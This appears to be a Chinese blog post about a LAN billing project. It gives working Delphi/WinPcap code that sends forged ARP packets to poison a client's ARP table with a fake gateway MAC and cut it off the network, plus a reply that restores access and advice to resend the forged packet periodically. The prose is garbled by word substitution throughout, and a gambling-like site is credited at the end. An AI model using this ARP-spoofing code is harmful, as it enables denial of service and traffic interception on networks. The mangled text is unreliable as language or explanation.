前段工夫接到一个项目,该项目要求在局域网内的任何一台盘算机上安置一套计费软件,其他的客户端不必安置任何软件,只需客户拔出网线就可以计费。曩昔打仗到的计费软件都是安置在网打开的,要么便是要安置客户端软件,怎样完成如许的功效呢?研讨了一下,发明用arp诈骗的原理可以完成计费的功效,原理是在未守旧上彀功效的客户端拔出网线后,先克制局域网内的该盘算机上彀,等该客户端要求办理员守旧上彀功效后再排除对该客户真个制止并开端计费。arp诈骗信赖各人的都不生疏,网上有很多多少介绍arp诈骗的文章,也有很多多少arp诈骗的病毒,在这里就不再反复arp诈骗的原理了。
怎样制止局域网指定的客户端上彀呢?
用伪造的arp的哀求包革新要制止呆板的arp表,使之以为网关的mac地点为一个不存在的mac地点,如许的话就可以制止该呆板上彀了。
假定要制止的盘算机是A,安置计费软件的盘算机是B,网关是C
A呆板 MAC:AA-AA-AA-AA-AA-AA IP>###
B呆板 MAC:BB-BB-BB-BB-BB-BB IP>###
C网关 MAC:CC-CC-CC-CC-CC-CC IP>###
在网上有很多多少arp例子都是c的,我用delphi和Winpcap完成代码如下:
安置Winpcap,援用:winsock,Packet32,shellapi单位
范例和常量界说:
type
TMacAddr = array [0..5] of byte ;
TEHHDR=packed record
Ether_Dest: TMacAddr ; {目标地点 }
Ether_Src: TMacAddr ; {源地点 }
Ether_Type:Word; {范例 }
end;
PEHHDR=^TEHHDR;
TEtherData=packed record {Ethernet packet data}
Ether_hrd:WORD; {hardware address }
Ether_pro:WORD; {format of protocol address }
Ether_hln: byte; {byte length of each hardware address }
Ether_pln: byte; {byte length of each protocol address}
Ether_op:WORD; { ARP or RARP }
Ether_sha:TMacAddr; {hardware address of sender}
Ether_spa:LongWord; {protocol address of sender}
Ether_tha:TMacAddr; {hardware address of target}
Ether_tpa:LongWord; {protocol address of target}
end;
PARPHDR=^TEtherData;
TARPPACKET=packed record
EHHDR:Tehhdr;
EtherData:TEtherData;
end ;
PARPPACKET=^TARPPACKET;
const
INADDR_NONE = $FFFFFFFF;
EPT_IP = $0800;
EPT_ARP = $0806 ;
EPT_RARP =$8035 ;
ARP_REPLY =$0002 ;
ARP_REQUEST = $0001 ;
ARP_HARDWARE =$0001 ;
function inet_addr(const cp: PChar): DWord; stdcall; external 'WS2_32.DLL' name 'inet_addr';
//他人的代码
function HexStrtoInt(var Buf: string): dword;
//将十六进制的字符串转成整型
//判别能否是十六进制数
function IsHexChar(Chr: char): boolean;
begin
Result := (Chr in ['0'..'9']) or (Chr in ['A'..'F']);
end;
//将一个十六进制字符转换成数
function HexChrtoInt(Chr: char): byte;
begin
Result := 0;
case Chr of
'0'..'9' : Result := Strtoint(Chr);
'A' : Result := 10;
'B' : Result := 11;
'C' : Result := 12;
'D' : Result := 13;
'E' : Result := 14;
'F' : Result := 15;
end;
end;
var
BufLength: dword;
TempBuf: string;
Count0: dword;
begin
Result := 0;
BufLength := Length(Buf);
TempBuf := '';
if BufLength > 0 then begin
Buf := Uppercase(Buf);
// for Count0 := 1 to BufLength
if BufLength mod 2 = 1 then begin
Buf := '0' + Buf;
BufLength := Length(Buf);
end;
for Count0 := 1 to BufLength div 2 do
if IsHexChar(Buf[Count0 * 2 - 1]) then begin
if IsHexChar(Buf[Count0 * 2]) then begin
TempBuf := TempBuf + inttostr(HexChrtoInt(Buf[Count0 * 2 - 1])
* 16 + HexChrtoInt(Buf[Count0 * 2]));
end else begin
Result := Count0 * 2;
Break;
end;
end else begin
Result := Count0 * 2 - 1;
Break;
end;
if Result = 0 then Buf := TempBuf;
end;
end;
//MAC转换
procedure GetMac(s : string;var Mac : TMacAddr);
var
hs : string;
p : integer;
i,j:integer;
begin
FillChar (Mac, SizeOf (Mac), 0) ;
i:=0;
if Length(s)=0 then
Exit;
p:=Pos('-',s);
while P<>0 do
begin
hs:=Copy(s,1,p-1);
HexStrtoInt(hs);
Mac[i]:= strtoint(hs) ;
Delete(s,1,p);
p:=Pos('-',s);
i:=i+1;
end;
if Length(s)>0 then
begin
HexStrtoInt(s);
Mac[i]:=strtoint(s);
end;
end;
{克制上彀,发送arp哀求包,这里的C_mac为伪造的C的mac地点}
procedure SendArp(A_ip:string;A_mac:string;B_ip:string;B_mac:string;C_IP:string;C_mac:string);
var
ulMACAddr: TMacAddr;
EHHDR:TEHHDR;
EtherData:TEtherData;
pp:pPacket;
lpAdapter:Padapter;
BUF:Array [0..512] of char ;
begin
//以太网包首部
GetMac(A_mac,ulMACAddr);
Move(ulMACAddr , EHHDR.Ether_Dest,6);//目标地点-A盘算机的地点
GetMac(C_mac,ulMACAddr);
Move(ulMACAddr , EHHDR.Ether_Src,6);//伪造的源地点-C盘算机的地点
EHHDR.Ether_Type := htons(EPT_ARP);//arp包
//结构以太网包数据
EtherData.Ether_hrd := htons(ARP_HARDWARE);
EtherData.Ether_pro := htons(EPT_IP);
EtherData.Ether_hln := 6;
EtherData.Ether_pln := 4;
EtherData.Ether_op := htons(ARP_REQUEST);//arp哀求包
GetMac(C_mac,ulMACAddr);
Move(ulMACAddr , EtherData.Ether_sha,6);
EtherData.Ether_spa := inet_addr(Pchar(B_IP));
GetMac(B_mac,ulMACAddr);
Move(ulMACAddr , EtherData.Ether_tha,6);
EtherData.Ether_tpa := inet_addr(Pchar(B_ip));
lpAdapter := PacketOpenAdapter('\Device\NPF_{E00872C1-37C0-47CE-8472-313A5A23F896}'); // 依据
你网卡名字翻开网卡,这是我网卡的设置装备摆设名
fillchar(BUF,sizeof(BUF),0);
CopyMemory(@BUF,@EHHDR,SIZEOF(EHHDR));
CopyMemory(Pointer(LongWord(@BUF)+SIZEOF(EHHDR)),@EtherData,SIZEOF(EtherData));
// 分派内存
pp := PacketAllocatePacket();
//初始化布局指针
PacketInitPacket(pp, @BUF,512);
//发arp应对包
PacketSendPacket(lpAdapter, pp, true);
// 开释内存
PacketFreePacket(pp);
PacketCloseAdapter(lpAdapter);
end;
//挪用示例
###,'AA-AA-AA-AA-AA-AA','192.168.1.2','BB-BB-BB-BB-BB-BB','192.168.1.253','00-00-00-00-00-00');
{排除制止,发送arp应对包,这里的C_mac为真实的C的mac地点}
procedure SendArpReply(A_ip:string;A_mac:string;C_ip:string;C_mac:string;B_mac:string);
var
ulMACAddr: TMacAddr;
EHHDR:TEHHDR;
EtherData:TEtherData;
pp:pPacket;
lpAdapter:Padapter;
BUF:Array [0..512] of char ;
begin
GetMac(A_mac,ulMACAddr);
Move(ulMACAddr , EHHDR.Ether_Dest,6);
GetMac(B_mac,ulMACAddr);
Move(ulMACAddr , EHHDR.Ether_Src,6);
EHHDR.Ether_Type := htons(EPT_ARP);
EtherData.Ether_hrd := htons(ARP_HARDWARE);
EtherData.Ether_pro := htons(EPT_IP);
EtherData.Ether_hln := 6;
EtherData.Ether_pln := 4;
EtherData.Ether_op := htons(ARP_REPLY);//arp应对包
GetMac(C_mac,ulMACAddr);
Move(ulMACAddr , EtherData.Ether_sha,6);
EtherData.Ether_spa := inet_addr(Pchar(C_ip));
GetMac(A_mac,ulMACAddr);
Move(ulMACAddr , EtherData.Ether_tha,6);
EtherData.Ether_tpa := inet_addr(Pchar(A_ip));
// 依据本人网卡的设置装备摆设名翻开网卡
lpAdapter := PacketOpenAdapter('\Device\NPF_{E00872C1-37C0-47CE-8472-313A5A23F896}');
fillchar(BUF,sizeof(BUF),0);
CopyMemory(@BUF,@EHHDR,SIZEOF(EHHDR));
CopyMemory(Pointer(LongWord(@BUF)+SIZEOF(EHHDR)),@EtherData,SIZEOF(EtherData));
// 分派内存
pp := PacketAllocatePacket();
//初始化布局指针
PacketInitPacket(pp, @BUF,512);
//发arp应对包
PacketSendPacket(lpAdapter, pp, true);
// 开释内存
PacketFreePacket(pp);
PacketCloseAdapter(lpAdapter);
end;
//挪用示例
SendArpReply('192.168.1.1','AA-AA-AA-AA-AA-AA','192.168.1.253','CC-CC-CC-CC-CC-CC','BB-BB-BB-BB-BB-BB');
必要留意的是,收回伪造的arp哀求包过一段工夫后会被革新为准确的,以是每隔一段工夫要向被制止的呆板发送一个arp包,如许才干到达制止上彀的目标。
本文泉源于 新疆二域九游会网 转载请注明来由
|
